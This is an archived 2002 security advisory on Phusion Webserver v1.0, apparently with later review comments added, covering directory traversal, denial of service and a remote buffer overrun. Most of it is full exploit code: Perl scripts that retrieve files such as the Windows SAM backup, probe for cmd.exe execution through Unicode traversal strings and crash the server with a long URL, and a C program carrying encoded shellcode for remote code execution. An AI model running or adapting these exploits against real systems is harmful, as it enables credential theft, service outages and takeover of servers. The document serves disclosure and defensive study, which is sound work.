
Phusion Webserver Directory Traversal, DoS Vulnerabilities
19th Feb 2002 [SBWID-5111]
COMMAND

	Phusion Webserver Directory Traversal, DoS and Buffer Overrun Vulnerabilities

SYSTEMS AFFECTED

	Version: v1.0

PROBLEM

	Alex Hernandez found that Phusion Webserver v1.0 for Windows 9x/NT/2000
	contains three remotely exploitable flaws: a directory traversal that lets
	any client list and retrieve arbitrary files from the server, a denial of
	service triggered by an over-long URL, and a buffer overrun.
	

	Phusion Webserver is a web server for Windows 9x/NT/2000
	(http://www.bbshareware.com/phusion/). A path-handling bug lets any remote
	client change to any directory, list its files and GET them by path. A
	separate buffer overrun allows arbitrary code to be run on the server.
	

	 Directory traversal

	 ===================

	

	The traversal is triggered by a specially crafted URL built from triple-dot
	".../" directory traversal sequences, optionally with URL-encoded
	representations substituted for the "/" and "\" separators.
	

	Example:
	

	

	http://www.example.com/.../.../.../.../test.txt

	

	sh-2.04# nc -vvn 10.0.0.1 80

	(UNKNOWN) [10.0.0.1] 80 (?) open

	GET /.../.../.../.../test.txt HTTP/1.0
	(press Enter twice: the empty line ends the request)

	

	

	

	 DoS

	 ===

	

	The server crashes when sent a very long URL (about 2500 characters in the
	example below; the Phusion_DoS.pl script further down sends 3000):
	

	http://10.0.0.1/cgi-bin/AAAAAAAAA...(Ax2500)...AAA

	

	

	

	 Exploits Directory traversal, DoS, buffer overrun

	 =================================================

	

	

	------oOo------------------------

	Exploit Code GET files Phusion-GET.pl

	------oOo------------------------

	

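	#!/usr/bin/perl
	#
	# THIS SCRIPT ONLY FOR WINDOWS WITH PERL OR CYGWIN
	#
	# Simple script to get files on server.
	#
	# Maybe u need this line for windows:
	# #! c:\perl\bin\perl.exe
	#
	# Phusion Webserver v1.0 proof-of-concept exploit.
	# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
	#
	# Thanks all the people from Spain and Argentina.
	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
	# G.Maggiotti & H.Oliveira.
	#
	# Usage: perl -x Phusion-GET.pl <And read the Instructions>
	#
	# Review notes:
	#  - Answers are read from STDIN.  The original kept the trailing newline
	#    (so the URL contained "host\n") and never applied the advertised
	#    defaults, because "\n" is a true value to "||".  Answers are now
	#    chomped and an empty answer selects the default.
	#  - The URL is passed to explorer.exe with the list form of system(), so
	#    the typed host/path never reaches a shell.
	#  - This script uses "/../../.." while the advisory text and the nc
	#    example use the triple-dot "/.../" sequence.  Browsers generally
	#    collapse plain ".." segments before sending a request, so if this
	#    returns nothing, send the request by hand as shown in the advisory.

	use strict;
	use warnings;

	print("\nPhusion Webserver v1.0 GET Files exploit (c)2002.\n");
	print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

	# Print a prompt, read one line from STDIN and return it trimmed; an
	# empty line or EOF returns $default.
	sub prompt_with_default {
	    my ($prompt, $default) = @_;
	    print $prompt;
	    my $answer = <STDIN>;
	    $answer = '' unless defined $answer;
	    chomp $answer;
	    $answer =~ s/^\s+|\s+$//g;         # stray blanks would corrupt the URL
	    return length($answer) ? $answer : $default;
	}

	my $host = prompt_with_default(
	    "Please type the address remote webserver, example: www.whitehouse.gov\n"
	  . "[Default remote Webserver is \"127.0.0.1\"]:\n",
	    '127.0.0.1',
	);

	# /winnt/repair/ is only an example taken from IIS 4/5 installs (the SAM
	# backup lives there); it says nothing about where Phusion is installed.
	my $directory = prompt_with_default(
	    "Please type only in the directory where the file is located you want to\n"
	  . "download, \n"
	  . "example: /winnt/repair/\n"
	  . "[default directory is \"/winnt/repair/\"] :\n",
	    '/winnt/repair/',
	);

	my $file = prompt_with_default(
	    "Please type in the filename you want download example: sam._ \n"
	  . "[default file is \"sam._\"] :\n",
	    'sam._',
	);

	# Maybe u to change this line depending of PATH installation.
	# (The number of ".." segments needed depends on the depth of the web root.)
	my $url = "http://$host:80/../../..$directory$file";
	system("explorer.exe", $url) == 0
	    or warn "explorer.exe exited with status $? (Windows with explorer.exe on PATH required)\n";

	print "HAVE Fun!. ;-)  \n";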

	

	

	

	------oOo------------------------

	Exploit Code Traversal Phusion_exp.pl

	------oOo------------------------

	

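	#!/usr/bin/perl
	#
	# Simple script to identify if the host is vulnerable!,
	#
	# This does 15 different checks based IIS 4-5. Have Fun!
	#
	# Phusion Webserver v1.0 proof-of-concept exploit
	# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
	#
	# Thanks all the people from Spain and Argentina.
	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
	# G.Maggiotti & H.Oliveira.
	#
	#
	# Usage: perl -x Phusion_exp.pl <Hosts>:<Port>
	#
	# Example:
	#
	# perl -x Phusion_exp.pl www.whitehouse.com:80
	# Trying.....................
	#
	# <THIS HOST IS VULNERABLE> :-)
	# Check the previous notes to execute bugs.
	#
	# Review notes:
	#  - Each request is sent as "GET <path> HTTP/1.0" on one line.  The
	#    original listing had the path on a line of its own, which is not a
	#    valid request line.
	#  - Checks 1-14 are the IIS 4/5 Unicode / overlong-UTF-8 traversal
	#    strings; only check 15 ("/.../") is the sequence the Phusion advisory
	#    describes.  Checks 3-6 use "p", "v", "q" and "s" where hex digits
	#    belong, so they are not valid percent-encodings; they are kept only
	#    for parity with the original.
	#  - A response counts as a hit when it contains "Directory", which is what
	#    "dir" prints ("Directory of ...") but also what a "Directory not
	#    found" style error page would contain.  Confirm any hit by hand; the
	#    matching path is printed to make that easier.
	#  - The port defaults to 80 when none is given; the original left $port
	#    undefined in that case.  $ARGV[0] is used instead of the @ARGV[0]
	#    slice.

	use strict;
	use warnings;
	use Socket;

	if (@ARGV < 1) {
	    die "\n\nPhusion Webserver v1.0 traversal exploit(c)2002.\n"
	      . "Alex Hernandez al3xhernandez\@ureach.com\n\n\n"
	      . "Usage: perl -x $0 www.whitehouse.com:80 {OR}\n\n"
	      . "[if the host is not using a proxy]\n\n"
	      . "Usage: perl -x $0 127.0.0.1:80\n\n";
	}

	my ($host, $port) = split /:/, $ARGV[0];
	$port = 80 unless defined $port && length $port;    # ":port" is optional
	die "Port must be numeric: $port\n" unless $port =~ /\A\d+\z/;

	print "Trying.....................\n";
	my $target = inet_aton($host)
	    or die "Cannot resolve host: $host\n";

	# Paths tried, in the original order.  cmd.exe "dir" output is the signal.
	my @paths = (
	    '/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir',                  # 1
	    '/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir',                   # 2 (no "/" after scripts, as in the original; 8 has it)
	    '/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir',                  # 3 (invalid hex digit, see notes)
	    '/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir',                  # 4 (invalid hex digit)
	    '/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir',                  # 5 (invalid hex digit)
	    '/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir',                  # 6 (invalid hex digit)
	    '/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir',                  # 7
	    '/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir',                  # 8
	    '/scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir',                  # 9
	    '/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir',               # 10
	    '/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir',            # 11
	    '/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir',         # 12
	    '/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir',      # 13
	    '/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir',  # 14
	    '/.../.../.../.../winnt/system32/cmd.exe?/c+dir',                     # 15 (the Phusion sequence)
	);

	my $flag   = 0;
	my $method = 0;
	for my $path (@paths) {
	    $method++;
	    my @results = sendraw("GET $path HTTP/1.0\r\n\r\n");
	    if (grep { /Directory/ } @results) {
	        $flag = 1;
	        print "method $method matched: GET $path\n";
	    }
	}

	if ($flag == 1) {
	    print "<THIS HOST IS VULNERABLE> :-)\n\nCheck the previous notes to execute bugs\n";
	}
	else {
	    print "<THIS HOST IS NOT VULNERABLE> :-( \n\nCheck manually on browser...\n";
	}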

	

	

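	# Send one raw HTTP request to the target chosen on the command line and
	# return the whole response as a list of lines.
	#
	# Reads the file-scope $port and $target (set from @ARGV above).  Dies if
	# the socket cannot be created or connected, exactly as the original did,
	# so one refused connection still aborts the whole scan.
	#
	# Review note: the original built the address by hand with
	# pack("SnA4x8", 2, $port, $target), which hard-codes the x86
	# Linux/Windows sockaddr_in layout; Socket's sockaddr_in() is portable.
	sub sendraw {
	    my ($pstr) = @_;
	    my $proto = getprotobyname('tcp') || 0;
	    socket(my $sock, PF_INET, SOCK_STREAM, $proto)
	        or die("Socket problems\n");
	    connect($sock, sockaddr_in($port, $target))
	        or die("Can't connect check the port or address...\n");

	    # Unbuffered, so the request is on the wire before we block on the read.
	    my $previous = select($sock);
	    $| = 1;
	    select($previous);
	    print {$sock} $pstr;

	    my @in = <$sock>;
	    close($sock);
	    return @in;
	}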

	

	

	

	------oOo-------------

	Exploit Code DoS Phusion_DoS.pl

	------oOo-------------

	

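	#!/usr/bin/perl
	#
	# Simple script to send a long 'A's' command to the server,
	# resulting in the server crashing.
	#
	# Phusion Webserver v1.0 proof-of-concept exploit.
	# By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.
	#
	# Thanks all the people from Spain and Argentina.
	# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
	# G.Maggiotti & H.Oliveira.
	#
	#
	# Usage: perl -x Phusion_DoS.pl -s <server>
	#
	# Example:
	#
	# perl -x Phusion_DoS.pl -s 10.0.0.1
	#
	# Crash was successful !
	#
	# Review notes:
	#  - The request line is "GET /cgi-bin/AAAA... HTTP/1.0".  The original
	#    sent "... /HTTP/1.0", which is not a valid request line.
	#  - The original printed "Crash was successful !" regardless of what
	#    happened.  This version reconnects after sending and reports what it
	#    observed; a refused second connection is an indication, not proof,
	#    that the server went down.
	#  - 3000 bytes of padding is what the original sent; the advisory text
	#    quotes about 2500.
	#  - The bare "($serv,$port,...)" list of the original did nothing; the
	#    variables are now declared with my.

	use strict;
	use warnings;
	use Getopt::Std;
	use IO::Socket;

	print("\nPhusion Webserver v1.0 DoS exploit (c)2002.\n");
	print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

	my %args;
	getopts('s:', \%args);
	usage() if !defined($args{s});

	my $serv = $args{s};
	my $port = 80;
	my $num  = 3000;
	my $data = 'A' x $num;
	my $buf  = "GET /cgi-bin/$data HTTP/1.0\r\n\r\n";

	# Open a TCP connection to the target; IO::Socket::INET resolves the name
	# and leaves the reason for a failure in $@.
	sub open_target {
	    return IO::Socket::INET->new(
	        PeerAddr => $serv,
	        PeerPort => $port,
	        Proto    => 'tcp',
	        Timeout  => 10,
	    );
	}

	my $sock = open_target()
	    or die("Error: cannot connect to $serv:$port ($@)\n");
	$sock->autoflush(1);
	print {$sock} $buf;
	close($sock);

	# Give the server a moment, then see whether it still accepts connections.
	sleep 2;
	if (my $probe = open_target()) {
	    close($probe);
	    print("\nServer still accepts connections; no crash observed.\n\n");
	}
	else {
	    print("\nCrash was successful !\n\n");
	}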

	

	# Abort with the command-line synopsis.  $0 is the name this script was
	# invoked as; die() writes the message to STDERR and exits non-zero.
	sub usage {
	    my $synopsis = "Usage: perl -x $0 -s <server>";
	    die "\n\n" . $synopsis . "\n\n";
	}

	

	

	

	------oOo------------------------

	Exploit Code BufferOverrun Phusion-ovrun.c

	------oOo------------------------

	

	/** Phusion-Overun.c 

	** -Remote exploit for Phusion Webserver v1.0 for WinNT.

	**

	** Phusion Webserver v1.0 exploit gets remote servers\'s full control.

	** When you attacks a vulnerable server you can run abitrary code

	** inside.

	**

	** Phusion Webserver v1.0 proof-of-concept exploit.

	** By Alex Hernandez <al3xhernandez@ureach.com> (C)2002.

	**

	** Thanks all the people from Spain and Argentina.

	** Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins, 

	** G.Maggiotti & H.Oliveira.

	** 

	**

	** Compile: gcc -o Phusion-ovrun Phusion-ovrun.c

	**

	** Usage: ./Phusion-ovrun <hostname>

	**

	**

	** 

	**

	**/

	

	

	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>
	#include <sys/errno.h>
	#include <sys/socket.h>
	#include <netinet/in.h>
	#include <arpa/inet.h>
	#include <netdb.h>

	

	#define _PORT   80      /* target HTTP port */

	#define _X 10000        /* NOTE(review): larger than sizeof(runcrash) (~771 bytes); must not be used as the send length */

	

	/* The request main() sends verbatim: "GET /" followed by a run of 0x90
	 * NOPs, what appears to be a small decoder loop (lodsb / xor al,0x99 /
	 * stosb / loop -- TODO confirm by disassembly), the encoded payload and a
	 * short trailer.  XOR-ing a few payload bytes with 0x99 yields readable
	 * text such as "Server hacked", so the payload carries embedded strings.
	 * Nothing is patched at run time: the bytes go out exactly as listed.
	 *
	 * Review notes:
	 *  - sizeof(runcrash) is about 771 bytes (770 plus the terminating NUL).
	 *    _X (10000) is far larger, so write(sock, runcrash, _X) in main()
	 *    reads well past the end of this array and sends whatever follows it
	 *    in memory.  Send sizeof(runcrash) - 1 bytes instead.
	 *  - As reproduced in this archive the listing shows doubled backslashes
	 *    and escaped quotes (\\x90, \"GET /\"); the compilable form is \x90
	 *    and "GET /".
	 */
	char runcrash[] =

	\"GET /\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x81\\xc7\\xc8\\x10\\x10\\x10\\x81\\xef\\x10\"

	\"\\x10\\x10\\x10\\x57\\x5e\\x33\\xc0\\x66\\xb8\\x31\\x02\\x90\\x90\\x50\"

	\"\\x59\\xac\\x34\\x99\\xaa\\xe2\\xfa\\x71\\x99\\x99\\x99\\x99\\xc4\\x18\"

	\"\\x74\\xb1\\x89\\xd9\\x99\\xf3\\x99\\xf1\\x19\\x99\\x99\\x99\\xf3\\x9b\"

	\"\\xf3\\x99\\xf3\\x99\\xf1\\x99\\x99\\x99\\xd9\\x14\\x2c\\xac\\x8b\\xd9\"

	\"\\x99\\xcf\\xf1\\x19\\x02\\xd4\\x99\\xc3\\x66\\x8b\\xc9\\xc2\\xf3\\x99\"

	\"\\x14\\x24\\x3a\\x89\\xd9\\x99\\xaa\\x59\\x32\\x14\\x2c\\x3a\\x89\\xd9\"

	\"\\x99\\xcf\\xf1\\xd3\\x98\\x99\\x99\\x09\\x14\\x2c\\x72\\x89\\xd9\\x99\"

	\"\\xcf\\xca\\xf1\\x49\\x05\\xd4\\x99\\xc3\\x66\\x8b\\xca\\xf1\\x05\\x02\"

	\"\\xd4\\x99\\xc3\\x66\\x8b\\xf1\\xa9\\xd4\\xde\\x99\\xc6\\x14\\x2c\\x3e\"

	\"\\x89\\xd9\\x99\\xf3\\xdd\\x09\\x09\\x09\\x09\\xc0\\x35\\x33\\x7b\\x65\"

	\"\\xf3\\x99\\x23\\x31\\x02\\xd4\\x99\\x66\\x8b\\x99\\x99\\x99\\x99\\xca\"

	\"\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xf1\\xf8\\xfa\\xf2\\xfc\\xfd\\xb7\\xa5\"

	\"\\xb6\\xf1\\xab\\xa7\\xf1\\xed\\xed\\xe9\\xa3\\xb6\\xb6\\xee\\xee\\xee\"

	\"\\xb7\\xfd\\xfc\\xfc\\xe9\\xe3\\xf6\\xf7\\xfc\\xb7\\xf6\\xeb\\xfe\\xb9\"

	\"\\xb9\\xca\\xe9\\xf5\\xf6\\xf0\\xed\\xb9\\xfa\\xf6\\xfd\\xfc\\xfd\\xb9\"

	\"\\xfb\\xe0\\xb9\\xe5\\xc3\\xf8\\xf7\\xb9\\xe4\\xa3\\xb0\\xa5\\xf1\\xed\"

	\"\\xf4\\xf5\\xa7\\xa5\\xf1\\xfc\\xf8\\xfd\\xa7\\xa5\\xed\\xf0\\xed\\xf5\"

	\"\\xfc\\xa7\\xca\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xf1\\xf8\\xfa\\xf2\\xfc\"

	\"\\xfd\\xb7\\xa5\\xb6\\xed\\xf0\\xed\\xf5\\xfc\\xa7\\xa5\\xb6\\xf1\\xfc\"

	\"\\xf8\\xfd\\xa7\\xa5\\xfb\\xf6\\xfd\\xe0\\xa7\\xa5\\xfa\\xfc\\xf7\\xed\"

	\"\\xfc\\xeb\\xa7\\xd1\\xfc\\xf5\\xf5\\xf6\\xb7\\xb9\\xc0\\xf6\\xec\\xb9\"

	\"\\xf8\\xeb\\xfc\\xb9\\xeb\\xec\\xf7\\xf7\\xf0\\xf7\\xfe\\xb9\\xf8\\xb9\"

	\"\\xc3\\xdb\\xca\\xfc\\xeb\\xef\\xfc\\xeb\\xb9\\xc9\\xcb\\xd6\\xea\\xb9\"

	\"\\xfb\\xec\\xfe\\xfe\\xe0\\xb9\\xef\\xfc\\xeb\\xea\\xf0\\xf6\\xf7\\xb9\"

	\"\\xf8\\xf7\\xfd\\xb9\\xe0\\xf6\\xec\\xb9\\xf1\\xf8\\xef\\xfc\\xb9\\xfb\"

	\"\\xfc\\xfc\\xf7\\xb9\\xf8\\xfb\\xec\\xea\\xfc\\xfd\\xb7\\xa5\\xe9\\xa7\"

	\"\\xd4\\xf6\\xeb\\xfc\\xb9\\xf0\\xf7\\xff\\xf6\\xeb\\xf4\\xf8\\xed\\xf0\"

	\"\\xf6\\xf7\\xb9\\xfa\\xf8\\xf7\\xb9\\xfb\\xfc\\xb9\\xfd\\xf6\\xee\\xf7\"

	\"\\xf5\\xf6\\xf8\\xfd\\xb9\\xff\\xeb\\xf6\\xf4\\xb9\\xf1\\xed\\xed\\xe9\"

	\"\\xa3\\xb6\\xb6\\xee\\xee\\xee\\xb7\\xfd\\xfc\\xfc\\xe9\\xe3\\xf6\\xf7\"

	\"\\xfc\\xb7\\xf6\\xeb\\xfe\\xb9\\xf6\\xeb\\xb9\\xf1\\xed\\xed\\xe9\\xa3\"

	\"\\xb6\\xb6\\xf4\\xf8\\xeb\\xfc\\xf8\\xea\\xef\\xf0\\xef\\xf8\\xea\\xb7\"

	\"\\xfa\\xf3\\xfb\\xb7\\xf7\\xfc\\xed\\xa5\\xe9\\xa7\\xeb\\xfc\\xfe\\xf8\"

	\"\\xeb\\xfd\\xea\\xb9\\xed\\xf6\\xb9\\xdd\\xfc\\xfc\\xe9\\xc3\\xf6\\xf7\"

	\"\\xfc\\xb9\\xfa\\xeb\\xfc\\xee\\xb9\\xb1\\xcd\\xf1\\xfc\\xce\\xf0\\xe3\"

	\"\\xf8\\xeb\\xfd\\xb5\\xb9\\xd8\\xf7\\xec\\xea\\xf2\\xf8\\xb9\\xf8\\xf7\"

	\"\\xfd\\xb9\\xd7\\xfc\\xf4\\xf6\\xb0\\xa5\\xe9\\xa7\\xda\\xf6\\xfd\\xfc\"

	\"\\xfd\\xb9\\xfb\\xe0\\xb9\\xe5\\xc3\\xf8\\xf7\\xb7\\xa5\\xb6\\xfa\\xfc\"

	\"\\xf7\\xed\\xfc\\xeb\\xa7\\xa5\\xb6\\xfb\\xf6\\xfd\\xe0\\xa7\\xa5\\xb6\"

	\"\\xf1\\xed\\xf4\\xf5\\xa7\\xb7\\xc5\\xf1\\xed\\xf4\\xf5\\xc5\\xca\\xfc\"

	\"\\xeb\\xef\\xfc\\xeb\\xd8\\xfb\\xec\\xea\\xfc\\xfd\\xfb\\xe0\\xf0\\xc3\"

	\"\\xf8\\xf7\\xb7\\xf1\\xed\\xf4\\xf5\\x99\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"

	\"\\x90\\x90\\x90\\x90\\x90\\xac\\xe0\\xe3\\x01\";

	

	

	int     sock;                   /* TCP socket to the target, opened in main() */

	struct  sockaddr_in sock_a;     /* target address: AF_INET, port _PORT, host from argv[1] */

	struct  hostent *host;          /* gethostbyname() result for argv[1] */

	

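	/* Connect to argv[1] on port _PORT and write the runcrash buffer followed
	 * by a blank line.  The program does not wait for a response.  Exit
	 * status: 0 after a complete write, -1 (255) when name resolution, socket
	 * creation, connect or the writes fail.
	 *
	 * Review notes:
	 *  - The original wrote _X (10000) bytes from runcrash, which is only
	 *    sizeof(runcrash) - 1 (about 770) bytes long, so roughly 9 KB beyond
	 *    the array were read and sent.  The length is now taken from the
	 *    array itself and short writes are reported instead of ignored.
	 *  - The title line says WinNT 4.0 SP5; nothing in the payload is adjusted
	 *    per target, so the embedded addresses presumably only fit that build.
	 */
	int main (int argc, char *argv[]) {
	  const size_t payload_len = sizeof(runcrash) - 1;  /* exclude the trailing NUL */
	  ssize_t n;

	  printf("\nWinNT 4.0 sp5 Phusion Webserver v1.0 BufferOverrun exploit\n");
	  printf("Alex Hernandez al3xhernandez@ureach.com\n\n");

	  if (argc < 2) {
	    fprintf(stderr, "Error : Usage: %s <hostname> \n", argv[0]);
	    exit(0);
	  }

	  if ((host = gethostbyname(argv[1])) == NULL) {
	    perror("gethostbyname");
	    exit(-1);
	  }

	  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
	    perror("create socket");
	    exit(-1);
	  }

	  memset(&sock_a, 0, sizeof(sock_a));
	  sock_a.sin_family = AF_INET;
	  sock_a.sin_port = htons(_PORT);
	  memcpy(&sock_a.sin_addr, host->h_addr, host->h_length);
	  if (connect(sock, (struct sockaddr *)&sock_a, sizeof(sock_a)) != 0) {
	    perror("create connect");
	    exit(-1);
	  }

	  fflush(stdout);

	  /* Send exactly the payload, nothing past the end of the array. */
	  n = write(sock, runcrash, payload_len);
	  if (n < 0 || (size_t)n != payload_len) {
	    perror("write payload");
	    close(sock);
	    exit(-1);
	  }
	  if (write(sock, "\n\n", 2) != 2) {
	    perror("write terminator");
	    close(sock);
	    exit(-1);
	  }
	  close(sock);
	  printf("done.\n\n");
	  return 0;
	}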

	

SOLUTION

	No vendor fix was available when this advisory was published. Until a
	fixed release exists, restrict who can reach the service at the network
	level or take it offline: each of the three issues is triggered by a
	single unauthenticated HTTP GET request, so any client that can connect
	can exploit them.
